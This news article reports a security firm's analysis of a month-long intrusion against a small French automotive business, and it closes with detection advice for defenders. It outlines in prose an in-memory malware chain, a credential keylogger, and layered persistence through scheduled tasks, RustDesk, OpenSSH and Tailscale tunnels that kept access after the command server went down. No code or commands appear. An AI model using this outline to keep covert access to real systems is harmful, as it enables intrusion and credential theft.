Cybersecurity researchers have detailed an intrusion campaign targeting a small automotive business in France, highlighting how attackers can maintain long term access to compromised systems even after their primary command and control infrastructure becomes unavailable. The investigation, conducted by Cato Networks’ CTRL research team, provided a rare view into an attacker’s activities through direct observation of command execution rather than relying solely on forensic evidence. Researchers were able to reconstruct the operation after the threat actor inadvertently exposed SSH keys, operational notes, and a detailed attack playbook in an unsecured storage bucket. The campaign, attributed to a French speaking operator known as “Poisson,” lasted 33 days and involved 339 recorded commands. Although researchers described the individual as a relatively inexperienced threat actor, the intrusion demonstrated how readily available tools and persistence techniques can allow attackers to retain access to compromised environments for extended periods.
According to Cato Networks, the attacker initially breached the organisation and deployed a keylogger designed to capture banking credentials, email account information, and authentication details used by employees. The operation focused primarily on harvesting sensitive login information rather than conducting ransomware activity or large scale data theft. Researchers observed that the attacker compromised four separate systems despite displaying inconsistent operational discipline throughout the campaign. The threat actor reportedly used low cost infrastructure, including a virtual private server hosted in Berlin, DuckDNS services, and Backblaze B2 cloud storage. Investigators found multiple operational mistakes, including repeated exposure of personal directories, storage buckets named after the attacker’s online alias, and testing artifacts left within malicious tools. Despite these errors, the campaign successfully established a foothold within the targeted environment. The malware chain relied heavily on in memory execution techniques. A Visual Basic Script downloader initiated the infection process, followed by PowerShell and .NET components that loaded the Havoc Demon remote access agent directly into memory without writing the payload to disk. The attacker also attempted to gain elevated privileges through Windows User Account Control prompts, requiring victims to manually approve access requests before administrative permissions could be obtained.
Once persistence was established, the attacker implemented multiple mechanisms to ensure continued access. Researchers documented the creation of scheduled tasks configured to execute at every user logon with elevated privileges, shellcode injection into Explorer.exe processes, and deployment of a customised version of RustDesk as a secondary remote access channel. The keylogger used during the operation was relatively simple, consisting of approximately 70 lines of Python code that recorded keystrokes to local files. Rather than automating the collection process, the attacker manually retrieved harvested information and modified power management settings to prevent compromised systems from entering sleep mode. The most significant activity occurred on April 7, when the attacker installed OpenSSH Server and Tailscale on an infected machine. By joining the device to a private Tailscale network and configuring key based SSH access along with reverse tunnelling capabilities, the threat actor created an alternative access path that operated independently from the primary command and control infrastructure. Researchers noted that this move proved particularly effective when the Havoc command and control server became unavailable the following day. Because the Tailscale connection functioned separately, the attacker retained uninterrupted access despite the outage.
The investigation revealed that command and control infrastructure resumed operation on April 26, allowing previously deployed malware agents to reconnect automatically without requiring additional compromise activities. During the final phase of the intrusion, the attacker executed more than 145 commands, examined smart card and certificate storage locations, and ran two unidentified programs extracted from a file named “Thales.zip” for approximately 32 minutes. Researchers were unable to determine the exact purpose of those programs. Before ending activity on May 1, the attacker removed 17 files from compromised systems and ceased operations. Cato Networks noted that many of the tools used during the campaign were legitimate applications commonly abused by threat actors, including Tailscale, OpenSSH, and RustDesk. Similar techniques have previously been associated with advanced threat groups and financially motivated cybercriminal operations. Researchers advised organisations to monitor for unusual installation of OpenSSH on Windows workstations, unexpected deployment of Tailscale, creation of reverse SSH tunnels, suspicious script execution through Windows Script Host, privileged scheduled tasks, and changes to power management settings. The findings underscore the importance of investigating alternative persistence mechanisms whenever command and control infrastructure associated with an intrusion is identified, as removing a single access channel may not fully eliminate an attacker’s presence within a compromised environment.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
